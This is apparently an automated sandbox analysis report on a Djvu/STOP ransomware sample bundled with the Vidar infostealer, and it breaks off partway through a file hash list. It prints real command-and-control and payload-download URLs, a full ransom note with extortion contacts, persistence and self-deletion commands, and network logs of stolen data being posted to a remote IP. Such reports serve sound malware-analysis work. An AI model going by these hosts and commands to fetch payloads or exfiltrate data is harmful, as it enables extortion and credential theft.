Overview

overview

10

Static

static

3

winprofile

windows7-x64

10

winprofile

windows10-1703-x64

10

Analysis

  • max time kernel
    293s
  • max time network
    162s
  • platform
    windows7_x64
  • resource
    win7-20230621-en
  • resource tags

    arch:x64arch:x86image:win7-20230621-enlocale:en-usos:windows7-x64system
  • submitted
    30/06/2023, 05:04 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    fa7a4cefc74b946755bc35120386e77b14c2d26563421704e07dc009f80e12f8.exe

  • Size

    783KB

  • MD5

    2b1d02748bbf2a293604986d1e694a44

  • SHA1

    be2d8db989a9c0797991e27ef80044ba36b50f1d

  • SHA256

    fa7a4cefc74b946755bc35120386e77b14c2d26563421704e07dc009f80e12f8

  • SHA512

    e61bd9a6de336c5d3bd47aa9efba7dcafa55e827bb3627f2ca5e7714bb8458560f01b0806fc8450bab1a9ecafd253156c395bd3680ed924469d78a35961c4257

  • SSDEEP

    12288:AnedjM5K9AlaDf00EdmwoTaDTHsTlVn1U0PU1oRCRK5SmGXPU3WCRCt:AnofDzEYwo+DTWnW0cyIkVkPKy

Score
10/10
djvuvidar75b38583a079a9212c1fa894fd1b945fdiscoverypersistenceransomwarespywarestealer

Malware Config

Extracted

Family

djvu

C2

http://zexeq.com/test1/get.php

Attributes
  • extension

    .aghz

  • offline_id

    IGjpno8dwAKJpBjbvlsxfyQXyNoBoo3dXUtMk6t1

  • payload_url

    http://colisumy.com/dl/build2.exe

    http://zexeq.com/files/1/build3.exe

  • ransomnote

    ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-3OsGArf4HD Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@freshmail.top Reserve e-mail address to contact us: datarestorehelp@airmail.cc Your personal ID: 0735JOsie

rsa_pubkey.plain
1
-----BEGIN PUBLIC KEY-----
2
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAs2GxC12OwTlWciIhQP94
3
a3Po2kFcgzbR2KoMtsvkhvYmsdpsYNs31Dfd4wb9/W/USilyGz830xVCzjBSXpzV
4
F1Yb78BvxGT1vCypc3U4Uz3L8Er0xUOcQ5FpXtSoXxMCYOG1uYm7eE7c0O7QLbko
5
CMW4f5gPjE6yw4VkjOx9rkyfzS83GAFghVfpaRMOvNvQeOJ1a1C1eleO8y15GeqH
6
tRhOu7BVyCZ9njwJDw0f2Fxs/Jao7A4a2UmWoOhDB/ANGoQFmKbgpOYJIClz/cEA
7
DXd7jhp8Y5knc0RGKF9oDh40RYqtthO3AmuNCe3SMGuhgdXvmeuzjeD5UbxiYYun
8
vQIDAQAB
9
-----END PUBLIC KEY-----

Extracted

Family

vidar

Version

4.5

Botnet

75b38583a079a9212c1fa894fd1b945f

C2

https://steamcommunity.com/profiles/76561199520592470

https://t.me/motafan
Attributes
  • profile_id_v2

    75b38583a079a9212c1fa894fd1b945f

  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/111.0

Signatures

  • Detected Djvu ransomware 14 IoCs
  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

    ransomwaredjvu
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • Downloads MZ/PE file
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 6 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
    discovery
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
    spywarestealer
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Modifies system certificate store 2 TTPs 8 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\fa7a4cefc74b946755bc35120386e77b14c2d26563421704e07dc009f80e12f8.exe
    "C:\Users\Admin\AppData\Local\Temp\fa7a4cefc74b946755bc35120386e77b14c2d26563421704e07dc009f80e12f8.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:936
    • C:\Users\Admin\AppData\Local\Temp\fa7a4cefc74b946755bc35120386e77b14c2d26563421704e07dc009f80e12f8.exe
      "C:\Users\Admin\AppData\Local\Temp\fa7a4cefc74b946755bc35120386e77b14c2d26563421704e07dc009f80e12f8.exe"
      2⤵
      • Adds Run key to start application
      • Modifies system certificate store
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:848
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Users\Admin\AppData\Local\c23005e9-e7be-4060-a099-138c38cb43aa" /deny *S-1-1-0:(OI)(CI)(DE,DC)
        3⤵
        • Modifies file permissions
        PID:432
      • C:\Users\Admin\AppData\Local\Temp\fa7a4cefc74b946755bc35120386e77b14c2d26563421704e07dc009f80e12f8.exe
        "C:\Users\Admin\AppData\Local\Temp\fa7a4cefc74b946755bc35120386e77b14c2d26563421704e07dc009f80e12f8.exe" --Admin IsNotAutoStart IsNotTask
        3⤵
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:1728
        • C:\Users\Admin\AppData\Local\Temp\fa7a4cefc74b946755bc35120386e77b14c2d26563421704e07dc009f80e12f8.exe
          "C:\Users\Admin\AppData\Local\Temp\fa7a4cefc74b946755bc35120386e77b14c2d26563421704e07dc009f80e12f8.exe" --Admin IsNotAutoStart IsNotTask
          4⤵
          • Loads dropped DLL
          • Modifies system certificate store
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:1376
          • C:\Users\Admin\AppData\Local\8b635855-4b23-45b8-929b-5614bf4f2152\build2.exe
            "C:\Users\Admin\AppData\Local\8b635855-4b23-45b8-929b-5614bf4f2152\build2.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:2004
            • C:\Users\Admin\AppData\Local\8b635855-4b23-45b8-929b-5614bf4f2152\build2.exe
              "C:\Users\Admin\AppData\Local\8b635855-4b23-45b8-929b-5614bf4f2152\build2.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Checks processor information in registry
              • Modifies system certificate store
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:1324
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\8b635855-4b23-45b8-929b-5614bf4f2152\build2.exe" & exit
                7⤵
                  PID:1108
                  • C:\Windows\SysWOW64\timeout.exe
                    timeout /t 6
                    8⤵
                    • Delays execution with timeout.exe
                    PID:1936
            • C:\Users\Admin\AppData\Local\8b635855-4b23-45b8-929b-5614bf4f2152\build3.exe
              "C:\Users\Admin\AppData\Local\8b635855-4b23-45b8-929b-5614bf4f2152\build3.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:1652
              • C:\Windows\SysWOW64\schtasks.exe
                /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                6⤵
                • Creates scheduled task(s)
                PID:1656
    • C:\Windows\system32\taskeng.exe
      taskeng.exe {8AEC7B78-3153-4EF0-91F5-C8E435CC2A69} S-1-5-21-1437583205-2177757337-340526699-1000:XVLNHWCX\Admin:Interactive:[1]
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:1800
      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
        2⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:1064
        • C:\Windows\SysWOW64\schtasks.exe
          /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
          3⤵
          • Creates scheduled task(s)
          PID:748

    Network

    • flag-us
      DNS
      api.2ip.ua
      fa7a4cefc74b946755bc35120386e77b14c2d26563421704e07dc009f80e12f8.exe
      Remote address:
      8.8.8.8:53
      Request
      api.2ip.ua
      IN A
      Response
      api.2ip.ua
      IN A
      162.0.217.254
    • flag-nl
      GET
      https://api.2ip.ua/geo.json
      fa7a4cefc74b946755bc35120386e77b14c2d26563421704e07dc009f80e12f8.exe
      Remote address:
      162.0.217.254:443
      Request
      GET /geo.json HTTP/1.1
      User-Agent: Microsoft Internet Explorer
      Host: api.2ip.ua
      Response
      HTTP/1.1 429 Too Many Requests
      Date: Fri, 30 Jun 2023 05:04:28 GMT
      Server: Apache
      Strict-Transport-Security: max-age=63072000; preload
      X-Frame-Options: SAMEORIGIN
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block; report=...
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
      Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type
      Upgrade: h2,h2c
      Connection: Upgrade
      Transfer-Encoding: chunked
      Content-Type: text/html; charset=UTF-8
    • flag-nl
      GET
      https://api.2ip.ua/geo.json
      fa7a4cefc74b946755bc35120386e77b14c2d26563421704e07dc009f80e12f8.exe
      Remote address:
      162.0.217.254:443
      Request
      GET /geo.json HTTP/1.1
      User-Agent: Microsoft Internet Explorer
      Host: api.2ip.ua
      Response
      HTTP/1.1 429 Too Many Requests
      Date: Fri, 30 Jun 2023 05:04:42 GMT
      Server: Apache
      Strict-Transport-Security: max-age=63072000; preload
      X-Frame-Options: SAMEORIGIN
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block; report=...
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
      Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type
      Upgrade: h2,h2c
      Connection: Upgrade
      Transfer-Encoding: chunked
      Content-Type: text/html; charset=UTF-8
    • flag-us
      DNS
      colisumy.com
      fa7a4cefc74b946755bc35120386e77b14c2d26563421704e07dc009f80e12f8.exe
      Remote address:
      8.8.8.8:53
      Request
      colisumy.com
      IN A
      Response
      colisumy.com
      IN A
      201.252.19.77
      colisumy.com
      IN A
      2.180.10.7
      colisumy.com
      IN A
      211.171.233.129
      colisumy.com
      IN A
      211.119.84.111
      colisumy.com
      IN A
      123.231.118.19
      colisumy.com
      IN A
      190.224.203.37
      colisumy.com
      IN A
      189.232.28.79
      colisumy.com
      IN A
      187.147.229.14
      colisumy.com
      IN A
      92.83.236.139
      colisumy.com
      IN A
      185.12.79.25
    • flag-ar
      GET
      http://colisumy.com/dl/build2.exe
      fa7a4cefc74b946755bc35120386e77b14c2d26563421704e07dc009f80e12f8.exe
      Remote address:
      201.252.19.77:80
      Request
      GET /dl/build2.exe HTTP/1.1
      User-Agent: Microsoft Internet Explorer
      Host: colisumy.com
      Response
      HTTP/1.1 200 OK
      Date: Fri, 30 Jun 2023 05:04:44 GMT
      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
      Last-Modified: Wed, 28 Jun 2023 08:01:02 GMT
      ETag: "52a00-5ff2bfc24e387"
      Accept-Ranges: bytes
      Content-Length: 338432
      Connection: close
      Content-Type: application/octet-stream
    • flag-us
      DNS
      zexeq.com
      fa7a4cefc74b946755bc35120386e77b14c2d26563421704e07dc009f80e12f8.exe
      Remote address:
      8.8.8.8:53
      Request
      zexeq.com
      IN A
      Response
      zexeq.com
      IN A
      61.253.71.111
      zexeq.com
      IN A
      181.4.66.66
      zexeq.com
      IN A
      124.43.19.179
      zexeq.com
      IN A
      177.254.85.20
      zexeq.com
      IN A
      189.186.91.50
      zexeq.com
      IN A
      181.230.206.248
      zexeq.com
      IN A
      200.119.114.13
      zexeq.com
      IN A
      187.147.229.14
      zexeq.com
      IN A
      180.94.152.232
      zexeq.com
      IN A
      175.119.10.231
    • flag-kr
      GET
      http://zexeq.com/test1/get.php?pid=6894D7AA5473B71DB53DA9AA818B1EE8&first=true
      fa7a4cefc74b946755bc35120386e77b14c2d26563421704e07dc009f80e12f8.exe
      Remote address:
      61.253.71.111:80
      Request
      GET /test1/get.php?pid=6894D7AA5473B71DB53DA9AA818B1EE8&first=true HTTP/1.1
      User-Agent: Microsoft Internet Explorer
      Host: zexeq.com
      Response
      HTTP/1.1 200 OK
      Date: Fri, 30 Jun 2023 05:04:44 GMT
      Server: Apache/2.4.37 (Win64) PHP/5.6.40
      X-Powered-By: PHP/5.6.40
      Content-Length: 558
      Connection: close
      Content-Type: text/html; charset=UTF-8
    • flag-kr
      GET
      http://zexeq.com/files/1/build3.exe
      fa7a4cefc74b946755bc35120386e77b14c2d26563421704e07dc009f80e12f8.exe
      Remote address:
      61.253.71.111:80
      Request
      GET /files/1/build3.exe HTTP/1.1
      User-Agent: Microsoft Internet Explorer
      Host: zexeq.com
      Response
      HTTP/1.1 200 OK
      Date: Fri, 30 Jun 2023 05:04:48 GMT
      Server: Apache/2.4.37 (Win64) PHP/5.6.40
      Last-Modified: Sat, 31 Jul 2021 08:44:14 GMT
      ETag: "2600-5c86757379380"
      Accept-Ranges: bytes
      Content-Length: 9728
      Connection: close
      Content-Type: application/x-msdownload
    • flag-us
      DNS
      t.me
      build2.exe
      Remote address:
      8.8.8.8:53
      Request
      t.me
      IN A
      Response
      t.me
      IN A
      149.154.167.99
    • flag-us
      DNS
      steamcommunity.com
      build2.exe
      Remote address:
      8.8.8.8:53
      Request
      steamcommunity.com
      IN A
      Response
      steamcommunity.com
      IN A
      23.197.146.96
    • flag-us
      GET
      https://steamcommunity.com/profiles/76561199520592470
      build2.exe
      Remote address:
      23.197.146.96:443
      Request
      GET /profiles/76561199520592470 HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0
      Host: steamcommunity.com
      Response
      HTTP/1.1 200 OK
      Server: nginx
      Content-Type: text/html; charset=UTF-8
      Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ *.google-analytics.com https://www.google.com https://www.gstatic.com https://apis.google.com https://recaptcha.net https://www.gstatic.cn/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ *.google-analytics.com https://*.valvesoftware.com https://*.steambeta.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
      Expires: Mon, 26 Jul 1997 05:00:00 GMT
      Cache-Control: no-cache
      Date: Fri, 30 Jun 2023 05:04:59 GMT
      Content-Length: 34803
      Connection: keep-alive
      Set-Cookie: sessionid=6a975690e2d909a4248400ab; Path=/; Secure; SameSite=None
      Set-Cookie: steamCountry=US%7C5b568ee6ecd2b2e41b0e9f3b77002b41; Path=/; Secure; HttpOnly; SameSite=None
    • flag-de
      GET
      http://195.201.253.168/75b38583a079a9212c1fa894fd1b945f
      build2.exe
      Remote address:
      195.201.253.168:80
      Request
      GET /75b38583a079a9212c1fa894fd1b945f HTTP/1.1
      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/111.0
      Host: 195.201.253.168
      Response
      HTTP/1.1 200 OK
      Server: nginx
      Date: Fri, 30 Jun 2023 05:05:00 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
    • flag-de
      GET
      http://195.201.253.168/archive.zip
      build2.exe
      Remote address:
      195.201.253.168:80
      Request
      GET /archive.zip HTTP/1.1
      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/111.0
      Host: 195.201.253.168
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Server: nginx
      Date: Fri, 30 Jun 2023 05:05:00 GMT
      Content-Type: application/zip
      Content-Length: 2685679
      Last-Modified: Mon, 12 Sep 2022 13:14:59 GMT
      Connection: keep-alive
      ETag: "631f30d3-28faef"
      Accept-Ranges: bytes
    • flag-de
      POST
      http://195.201.253.168/
      build2.exe
      Remote address:
      195.201.253.168:80
      Request
      POST / HTTP/1.1
      Content-Type: multipart/form-data; boundary=----8469070475750417
      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/111.0
      Host: 195.201.253.168
      Content-Length: 82929
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Server: nginx
      Date: Fri, 30 Jun 2023 05:05:06 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
    • 162.0.217.254:443
      https://api.2ip.ua/geo.json
      tls, http
      fa7a4cefc74b946755bc35120386e77b14c2d26563421704e07dc009f80e12f8.exe
      1.1kB
       9.7kB
       13
      14

      HTTP Request

      GET https://api.2ip.ua/geo.json

      HTTP Response

      429
    • 162.0.217.254:443
      https://api.2ip.ua/geo.json
      tls, http
      fa7a4cefc74b946755bc35120386e77b14c2d26563421704e07dc009f80e12f8.exe
      1.0kB
       9.6kB
       12
      13

      HTTP Request

      GET https://api.2ip.ua/geo.json

      HTTP Response

      429
    • 201.252.19.77:80
      http://colisumy.com/dl/build2.exe
      http
      fa7a4cefc74b946755bc35120386e77b14c2d26563421704e07dc009f80e12f8.exe
      6.3kB
       349.1kB
       136
      259

      HTTP Request

      GET http://colisumy.com/dl/build2.exe

      HTTP Response

      200
    • 61.253.71.111:80
      http://zexeq.com/test1/get.php?pid=6894D7AA5473B71DB53DA9AA818B1EE8&first=true
      http
      fa7a4cefc74b946755bc35120386e77b14c2d26563421704e07dc009f80e12f8.exe
      367 B
       974 B
       5
      5

      HTTP Request

      GET http://zexeq.com/test1/get.php?pid=6894D7AA5473B71DB53DA9AA818B1EE8&first=true

      HTTP Response

      200
    • 61.253.71.111:80
      http://zexeq.com/files/1/build3.exe
      http
      fa7a4cefc74b946755bc35120386e77b14c2d26563421704e07dc009f80e12f8.exe
      462 B
       10.5kB
       8
      11

      HTTP Request

      GET http://zexeq.com/files/1/build3.exe

      HTTP Response

      200
    • 149.154.167.99:443
      t.me
      tls
      build2.exe
      385 B
       219 B
       5
      5
    • 149.154.167.99:443
      t.me
      tls
      build2.exe
      347 B
       219 B
       5
      5
    • 149.154.167.99:443
      t.me
      tls
      build2.exe
      288 B
       219 B
       5
      5
    • 149.154.167.99:443
      t.me
      build2.exe
      190 B
       92 B
       4
      2
    • 23.197.146.96:443
      https://steamcommunity.com/profiles/76561199520592470
      tls, http
      build2.exe
      1.5kB
       43.5kB
       23
      37

      HTTP Request

      GET https://steamcommunity.com/profiles/76561199520592470

      HTTP Response

      200
    • 195.201.253.168:80
      http://195.201.253.168/
      http
      build2.exe
      162.0kB
       2.8MB
       1342
      2029

      HTTP Request

      GET http://195.201.253.168/75b38583a079a9212c1fa894fd1b945f

      HTTP Response

      200

      HTTP Request

      GET http://195.201.253.168/archive.zip

      HTTP Response

      200

      HTTP Request

      POST http://195.201.253.168/

      HTTP Response

      200
    • 8.8.8.8:53
      api.2ip.ua
      dns
      fa7a4cefc74b946755bc35120386e77b14c2d26563421704e07dc009f80e12f8.exe
      56 B
       72 B
       1
      1

      DNS Request

      api.2ip.ua

      DNS Response

      162.0.217.254

    • 8.8.8.8:53
      colisumy.com
      dns
      fa7a4cefc74b946755bc35120386e77b14c2d26563421704e07dc009f80e12f8.exe
      58 B
       218 B
       1
      1

      DNS Request

      colisumy.com

      DNS Response

      201.252.19.77
      2.180.10.7
      211.171.233.129
      211.119.84.111
      123.231.118.19
      190.224.203.37
      189.232.28.79
      187.147.229.14
      92.83.236.139
      185.12.79.25

    • 8.8.8.8:53
      zexeq.com
      dns
      fa7a4cefc74b946755bc35120386e77b14c2d26563421704e07dc009f80e12f8.exe
      55 B
       215 B
       1
      1

      DNS Request

      zexeq.com

      DNS Response

      61.253.71.111
      181.4.66.66
      124.43.19.179
      177.254.85.20
      189.186.91.50
      181.230.206.248
      200.119.114.13
      187.147.229.14
      180.94.152.232
      175.119.10.231

    • 8.8.8.8:53
      t.me
      dns
      build2.exe
      50 B
       66 B
       1
      1

      DNS Request

      t.me

      DNS Response

      149.154.167.99

    • 8.8.8.8:53
      steamcommunity.com
      dns
      build2.exe
      64 B
       80 B
       1
      1

      DNS Request

      steamcommunity.com

      DNS Response

      23.197.146.96

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
      Filesize

      2KB

      MD5

      12cf3f7c5b0a343d46a960e36374432e

      SHA1

      c4385cb8e91123bbcee01892433bc8b0c3377167

      SHA256

      6dc7d2f12c7ed75825418011d67ecc0abb35ac3a65dc4582b9ecf8ee061bf901

      SHA512

      7c783a5771b810ff5925d4de6dbec8fd89ff8622cc13da40afc7df9f3f369f9e835b9b0ee84b7dcec0c8253e6c16371a36405e50ec214291944d2ddb36a036c2

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
      Filesize

      1KB

      MD5

      1f741b0c2176fb8677c5ed12d315afde

      SHA1

      fc09a6bbb2e86a5f5751c026fc400391b977232e

      SHA256

      6cf6b1b5c22df0dfa38b04c358821cacc893c22e18e1781d1c85e70933a7e370

      SHA512

      7c76250ce7215ac900532ff6d7140251af587724c161d8163bfe8a32ecd21d93c8c6401560ce49c9b91f8fb40619b842a0f574599ef50422c57de52c0ae0e285

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
      Filesize

      488B

      MD5

      2bf5c0b16e58c874fa919decb5ed984e

      SHA1

      be05f701fbc944cd84421cd22c6d5524ece6a6b4

      SHA256

      ec5541307c9d9fdd6495c1cac0b0ef940f718ad1ed43ba92ca13f03af7dd402f

      SHA512

      3694e5f2a5b280b112b5c2d0cb9d019b6b85af0993f0ded5511cec72c4dd927a3570fbc1703d2667153a4b3216552054a7e792d8607ae9c6f28b7573b3464f86

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      6a1606ca88442aa58ba9d99fa220d6c2

      SHA1

      af835708242ccd99696b9a1459121cdfb74ef1bf

      SHA256

      8c37c7ea8cbce8f05934ba57f402fe3c4050f1e7379f33c84be37a3d5a868a33

      SHA512

      91fb5cebd0c03d7825d97a71d5e2bd7627ea3ad2eb88a6bd18fe63cd9009e724d8a2768306c5a2075194d8b437edf0cbb93a77aa37ffec4b31f4d69b5af12bf9

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
      Filesize

      482B

      MD5

      fa453e29160487ff641297edbc923b32

      SHA1

      0343ed62427295734f924723766acb3617a2a9b8

      SHA256

      1c2f58c3c740016c84eef34b4b2895a9716a6225f8c928a5f4ed12425cec6efd

      SHA512

      4039e8879d42c44d983d7a46abd78a9153b3c985441483400280fc54e065d53303151a2506f1843d82a7a1620217d1a802efd48135aecae113fa501d71504fc7

      Download Submit

    • C:\Users\Admin\AppData\Local\8b635855-4b23-45b8-929b-5614bf4f2152\build2.exe
      Filesize

      330KB

      MD5

      f11de7628c58b4cd0bc3647984edc296

      SHA1

      5aa2db4791acb3f007ebadf6cad9ff9c9ed23ec7

      SHA256

      e356f807c297edf59ba7b0e1e0eb2a2186cc02246ad4bbe8d6fa42c7383b46c7

      SHA512

      cc9dcbd92ca83840b33dd2cceffa446bc5b2052ba14246750233cf10ae0b21b7ae3e30192fe5a3ce186d786c8ecbe2d59a80739adae843644f1b56ac16d03d59

      Download Submit

    • C:\Users\Admin\AppData\Local\8b635855-4b23-45b8-929b-5614bf4f2152\build2.exe
      Filesize

      330KB

      MD5

      f11de7628c58b4cd0bc3647984edc296

      SHA1

      5aa2db4791acb3f007ebadf6cad9ff9c9ed23ec7

      SHA256

      e356f807c297edf59ba7b0e1e0eb2a2186cc02246ad4bbe8d6fa42c7383b46c7

      SHA512

      cc9dcbd92ca83840b33dd2cceffa446bc5b2052ba14246750233cf10ae0b21b7ae3e30192fe5a3ce186d786c8ecbe2d59a80739adae843644f1b56ac16d03d59

      Download Submit

    • C:\Users\Admin\AppData\Local\8b635855-4b23-45b8-929b-5614bf4f2152\build2.exe
      Filesize

      330KB

      MD5

      f11de7628c58b4cd0bc3647984edc296

      SHA1

      5aa2db4791acb3f007ebadf6cad9ff9c9ed23ec7

      SHA256

      e356f807c297edf59ba7b0e1e0eb2a2186cc02246ad4bbe8d6fa42c7383b46c7

      SHA512

      cc9dcbd92ca83840b33dd2cceffa446bc5b2052ba14246750233cf10ae0b21b7ae3e30192fe5a3ce186d786c8ecbe2d59a80739adae843644f1b56ac16d03d59

      Download Submit

    • C:\Users\Admin\AppData\Local\8b635855-4b23-45b8-929b-5614bf4f2152\build2.exe
      Filesize

      330KB

      MD5

      f11de7628c58b4cd0bc3647984edc296

      SHA1

      5aa2db4791acb3f007ebadf6cad9ff9c9ed23ec7

      SHA256

      e356f807c297edf59ba7b0e1e0eb2a2186cc02246ad4bbe8d6fa42c7383b46c7

      SHA512

      cc9dcbd92ca83840b33dd2cceffa446bc5b2052ba14246750233cf10ae0b21b7ae3e30192fe5a3ce186d786c8ecbe2d59a80739adae843644f1b56ac16d03d59

      Download Submit

    • C:\Users\Admin\AppData\Local\8b635855-4b23-45b8-929b-5614bf4f2152\build3.exe
      Filesize

      9KB

      MD5

      9ead10c08e72ae41921191f8db39bc16

      SHA1

      abe3bce01cd34afc88e2c838173f8c2bd0090ae1

      SHA256

      8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0

      SHA512

      aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

      Download Submit

    • C:\Users\Admin\AppData\Local\8b635855-4b23-45b8-929b-5614bf4f2152\build3.exe
      Filesize

      9KB

      MD5

      9ead10c08e72ae41921191f8db39bc16

      SHA1

      abe3bce01cd34afc88e2c838173f8c2bd0090ae1

      SHA256

      8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0

      SHA512

      aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

      Download Submit

    • C:\Users\Admin\AppData\Local\8b635855-4b23-45b8-929b-5614bf4f2152\build3.exe
      Filesize

      9KB

      MD5

      9ead10c08e72ae41921191f8db39bc16

      SHA1

      abe3bce01cd34afc88e2c838173f8c2bd0090ae1

      SHA256

      8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0

      SHA512

      aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\Cab2DD7.tmp
      Filesize

      62KB

      MD5

      3ac860860707baaf32469fa7cc7c0192

      SHA1

      c33c2acdaba0e6fa41fd2f00f186804722477639

      SHA256

      d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904

      SHA512

